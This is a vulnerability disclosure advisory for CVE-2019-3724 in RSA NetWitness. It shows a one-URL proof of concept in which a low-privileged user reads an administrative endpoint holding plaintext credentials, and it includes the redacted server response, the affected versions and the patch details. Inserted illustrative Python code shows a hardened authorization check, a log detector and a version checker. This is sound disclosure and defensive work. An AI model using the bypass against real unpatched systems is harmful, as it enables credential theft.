Authorization Bypass Vulnerability in RSA NetWitness (CVE-2019-3724)

Project Description

RSA NetWitness is affected by an authorization bypass that can be exploited by an attacker in order to access an administrative resource that may contain plain text credentials.


Vendor description

“RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA’s award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime.”

Source: https://www.rsa.com/en-us/company/about


Business recommendation

By exploiting the vulnerability documented in this advisory an unauthorized attacker can access an administrative resource that may contain plain text credentials to a 3rd party system.

The vendor provides a patch which should be installed on affected systems.


Vulnerability overview/description

The platform's authorization mechanism is prone to an authorization bypass vulnerability that can be easily exploited by authenticated (but low-privileged) remote attackers to gain access to administrative information, including plaintext passwords.
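The following is an added illustration of the defect class described above; it is not code from RSA NetWitness or from this advisory. It contrasts an "authenticated means authorized" check, which lets any logged-in session read an administrative resource, with a deny-by-default check that requires an explicitly granted role for everything under /admin/. The role name "Analyst" comes from the advisory; "Administrator", the Session type and the policy table are assumptions made for the example.

```python
# Added illustration, not code from RSA NetWitness or SEC Consult: an
# "authenticated means authorized" check beside a deny-by-default, role-based
# check for administrative paths. The role name "Analyst" comes from the
# advisory; "Administrator" and the policy table below are assumptions.
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user: str
    role: str  # e.g. "Analyst" (from the advisory) or "Administrator" (assumed)


ADMIN_PREFIX = "/admin/"

# Assumed policy: each administrative path maps to the roles allowed to read it.
# Any path under /admin/ that is not listed here is denied to everyone.
ROLE_POLICY = {
    "/admin/system/whois/properties": frozenset({"Administrator"}),
}


def vulnerable_authorize(session, path):
    """Broken pattern: any valid session may read any resource, including /admin/."""
    return session is not None


def hardened_authorize(session, path):
    """Authenticate first, then require an explicitly granted role for /admin/ paths."""
    if session is None:
        return False
    if not path.startswith(ADMIN_PREFIX):
        return True  # non-administrative resources are outside this illustration
    for resource, allowed_roles in ROLE_POLICY.items():
        # match the resource itself or anything nested below it
        if path == resource or path.startswith(resource + "/"):
            return session.role in allowed_roles
    return False  # administrative path with no policy entry: deny by default
```

The point of the hardened form is the final `return False`: an administrative path that nobody thought to list is denied rather than silently granted, so a forgotten endpoint fails closed instead of open.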


Proof of concept

A logged-in, low-privileged user (e.g. with the Analyst role) can access an administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

After the above URL is accessed, the server returns the following HTTP response, which contains sensitive information for a 3rd party whois service, including plaintext passwords:

HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}} 
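As an added example (not part of the advisory and not NetWitness tooling), the following scans access-log lines for exactly the pattern shown above: a successful (HTTP 200) read of a resource under /admin/ by a session whose role is not administrative. The log layout, the role name "Administrator" and the sample lines are constructed for this example; a real deployment would map its own log fields onto `parse_line()`.

```python
# Added example, not part of the advisory or of any RSA NetWitness tooling:
# scan access-log lines for successful reads of /admin/ resources by sessions
# whose role is not administrative. The log layout below is constructed for
# this example; a real deployment would map its own fields onto parse_line().
import re
from dataclasses import dataclass

# Constructed layout: <ISO timestamp> user=<name> role=<role> <METHOD> <path> <status>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) role=(?P<role>\S+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)

ADMIN_PREFIX = "/admin/"
ADMIN_ROLES = frozenset({"Administrator"})  # assumed name of the privileged role


@dataclass(frozen=True)
class Finding:
    ts: str
    user: str
    role: str
    path: str


def parse_line(line):
    """Return a dict of fields, or None for a line that does not match the layout."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string before matching
    return rec


def find_admin_reads_by_non_admins(lines):
    """Flag 200 responses on /admin/ paths for non-administrative roles."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; count these separately in production
        if not rec["path"].startswith(ADMIN_PREFIX):
            continue
        if rec["role"] in ADMIN_ROLES:
            continue  # administrators are expected here
        if rec["status"] != 200:
            continue  # a 401/403 means the authorization check held
        findings.append(Finding(rec["ts"], rec["user"], rec["role"], rec["path"]))
    return findings


# Constructed sample log lines (not real NetWitness output).
SAMPLE_LOG = [
    "2019-05-09T10:00:01Z user=analyst1 role=Analyst GET /investigate/events 200",
    "2019-05-09T10:00:05Z user=analyst1 role=Analyst GET /admin/system/whois/properties 200",
    "2019-05-09T10:00:09Z user=admin1 role=Administrator GET /admin/system/whois/properties 200",
    "2019-05-09T10:00:12Z user=analyst2 role=Analyst GET /admin/system/whois/properties?x=1 403",
    "malformed line that should be skipped",
]

if __name__ == "__main__":
    for f in find_admin_reads_by_non_admins(SAMPLE_LOG):
        print(f"{f.ts} {f.user} ({f.role}) read {f.path}")
```

Only the second sample line is reported: the administrator's read is expected, and the 403 shows the check held for that request. The query string is stripped before prefix matching so a parameter cannot hide the path from the rule.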

Vulnerable / tested versions

The identified vulnerability has been verified to exist in the RSA NetWitness platform, version 11.1.0.1.

According to the vendor, platform version 10 is also affected.

The following versions are vulnerable:

  • < 10.6.6.1
  • < 11.2.1.1

Vendor contact timeline

2018-10-01: Contacting vendor through PGP via secure@dell.com
2018-10-02: Vendor acknowledges the information was received, forwards the info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue, starts to work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release, patch for platform version 11 will be released in March, version 10 Mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change, they will inform us
2019-05-06: Asking for a status update; no answer
2019-05-09: Noticed that the new release is online for a while now, asking the vendor for a status update again
2019-05-09: Vendor: published security advisory URL and CVE
2019-05-15: SEC Consult advisory release

Solution

The following patched versions address the identified issue:

  • 11.2.1.1
  • 10.6.6.1

Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202

The vendor specifically told us that version 11.3 is not affected by this vulnerability.
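As an added example (not from the advisory or the vendor), the following turns the version statements in this advisory into a branch-aware check: versions below 10.6.6.1 on the 10.x branch and below 11.2.1.1 on the 11.x branch are reported as vulnerable, 11.3 falls above the 11.x fix and is reported as fixed, and branches the advisory does not mention (for example 9.x or 12.x) are reported as "unknown" rather than guessed at. The function names and the 4-component padding rule are assumptions made for the example.

```python
# Added example, not from the advisory or the vendor: decide whether a reported
# RSA NetWitness version falls inside the affected ranges stated in this advisory
# (< 10.6.6.1 and < 11.2.1.1, fixed in 10.6.6.1 and 11.2.1.1; 11.3 not affected).
# Branches the advisory does not mention are reported as "unknown".
FIXED_BY_BRANCH = {
    10: (10, 6, 6, 1),
    11: (11, 2, 1, 1),
}


def parse_version(text):
    """Parse "11.1.0.1" or "11.3" into a 4-tuple, padding missing parts with 0."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = tuple(int(p) for p in parts)
    if len(nums) > 4:
        raise ValueError(f"expected at most four components: {text!r}")
    return nums + (0,) * (4 - len(nums))


def assess(text):
    """Return "vulnerable", "fixed" or "unknown" for a version string."""
    version = parse_version(text)
    fixed = FIXED_BY_BRANCH.get(version[0])
    if fixed is None:
        return "unknown"  # major version not covered by the advisory
    return "vulnerable" if version < fixed else "fixed"


if __name__ == "__main__":
    for v in ("11.1.0.1", "11.2.1.1", "10.6.5", "10.6.6.1", "11.3", "9.8"):
        print(v, "->", assess(v))
```

Padding short versions with zeros matters for the comparison: "10.6.6" becomes (10, 6, 6, 0), which sorts below the fix (10, 6, 6, 1) and is correctly reported as vulnerable.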

Workaround

None.


Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


EOF M. Juskauskas / @2019


Project Details

  • Title: Authorization Bypass
  • Product: RSA NetWitness
  • Vulnerable version: <10.6.6.1, <11.2.1.1
  • Fixed version: 10.6.6.1, 11.2.1.1
  • CVE number: CVE-2019-3724
  • Impact: Medium
  • Homepage: https://www.rsa.com
  • Found: 2018-09-18
  • By: Mantas Juskauskas (Office Vilnius) | SEC Consult Vulnerability Lab
